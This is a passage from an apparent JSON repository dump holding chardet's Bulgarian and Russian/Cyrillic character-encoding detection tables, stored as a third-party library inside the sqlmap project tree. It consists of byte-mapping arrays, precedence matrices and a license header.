,\n1,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,2,3,3,1,2,3,2,2,2,3,3,3,3,3,2,2,3,1,2,0,2,1,2,0,0,\n0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,1,3,3,3,3,3,2,3,3,3,2,3,3,2,3,2,2,2,3,1,2,0,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,3,3,3,3,1,1,1,2,2,1,3,1,3,2,2,3,0,0,1,0,1,0,1,0,0,\n0,0,0,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,2,2,3,2,2,3,1,2,1,1,1,2,3,1,3,1,2,2,0,1,1,1,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,1,3,2,2,3,3,1,2,3,1,1,3,3,3,3,1,2,2,1,1,1,0,2,0,2,0,1,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,2,2,3,3,3,2,2,1,1,2,0,2,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,0,1,2,1,3,3,2,3,3,3,3,3,2,3,2,1,0,3,1,2,1,2,1,2,3,2,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,1,1,2,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,1,3,3,2,3,3,2,2,2,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,3,0,3,3,3,3,3,2,1,1,2,1,3,3,0,3,1,1,1,1,3,2,0,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,1,1,3,1,3,3,2,3,2,2,2,3,0,2,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,2,3,3,2,2,3,2,1,1,1,1,1,3,1,3,1,1,0,0,0,1,0,0,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,2,3,2,0,3,2,0,3,0,2,0,0,2,1,3,1,0,0,1,0,0,0,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,2,1,1,1,1,2,1,1,2,1,1,1,2,2,1,2,1,1,1,0,1,1,0,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,2,1,3,1,1,2,1,3,2,1,1,0,1,2,3,2,1,1,1,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3,\n2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,\n3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,\n3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2,\n1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0,\n3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1,\n1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0,\n2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2,\n2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0,\n3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2,\n1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,\n2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2,\n2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,\n3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2,\n1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0,\n2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2,\n2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,\n2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2,\n1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0,\n2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2,\n1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,\n3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2,\n1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0,\n3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1,\n1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0,\n2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1,\n1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,\n2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2,\n1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,\n2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1,\n1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0,\n3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,\n1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2,\n1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1,\n2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2,\n1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,\n2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2,\n1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1,\n0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2,\n1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,\n2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1,\n1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,\n1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1,\n0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1,\n0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,\n0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,\n2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,\n1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,\n0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,\n0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,\n1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1,\n1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,\n1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n)\n\nLatin5BulgarianModel = {\n  'char_to_order_map': Latin5_BulgarianCharToOrderMap,\n  'precedence_matrix': BulgarianLangModel,\n  'typical_positive_ratio': 0.969392,\n  'keep_english_letter': False,\n  'charset_name': \"ISO-8859-5\",\n  'language': 'Bulgairan',\n}\n\nWin1251BulgarianModel = {\n  'char_to_order_map': win1251BulgarianCharToOrderMap,\n  'precedence_matrix': BulgarianLangModel,\n  'typical_positive_ratio': 0.969392,\n  'keep_english_letter': False,\n  'charset_name': \"windows-1251\",\n  'language': 'Bulgarian',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langcyrillicmodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# KOI8-R language model\n# Character Mapping Table:\nKOI8R_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,  # 80\n207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,  # 90\n223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237,  # a0\n238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,  # b0\n 27,  3, 21, 28, 13,  2, 39, 19, 26,  4, 23, 11,  8, 12,  5,  1,  # c0\n 15, 16,  9,  7,  6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54,  # d0\n 59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34,  # e0\n 35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70,  # f0\n)\n\nwin1251_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,\n207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,\n223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,\n239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,\n 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,\n 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,\n  3, 21, 10, 19, 13,  2, 24, 20,  4, 23, 11,  8, 12,  5,  1, 15,\n  9,  7,  6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,\n)\n\nlatin5_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,\n207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,\n223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,\n 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,\n 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,\n  3, 21, 10, 19, 13,  2, 24, 20,  4, 23, 11,  8, 12,  5,  1, 15,\n  9,  7,  6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,\n239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,\n)\n\nmacCyrillic_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,\n 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,\n191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,\n207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,\n223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,\n239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,\n  3, 21, 10, 19, 13,  2, 24, 20,  4, 23, 11,  8, 12,  5,  1, 15,\n  9,  7,  6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,\n)\n\nIBM855_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,\n206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,\n  3, 37, 21, 44, 28, 58, 13, 41,  2, 48, 39, 53, 19, 46,218,219,\n220,221,222,223,224, 26, 55,  4, 42,225,226,227,228, 23, 60,229,\n230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,\n  8, 49, 12, 38,  5, 31,  1, 34, 15,244,245,246,247, 35, 16,248,\n 43,  9, 45,  7, 32,  6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,\n250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,\n)\n\nIBM866_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154,  # 40\n155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253,  # 50\n253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69,  # 60\n 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253,  # 70\n 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,\n 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,\n  3, 21, 10, 19, 13,  2, 24, 20,  4, 23, 11,  8, 12,  5,  1, 15,\n191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,\n207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,\n223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,\n  9,  7,  6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,\n239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 97.6601%\n# first 1024 sequences: 2.3389%\n# rest  sequences:      0.1237%\n# negative sequences:   0.0009%\nRussianLangModel = (\n0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,\n3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,\n0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,\n0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,3,3,3,2,2,2,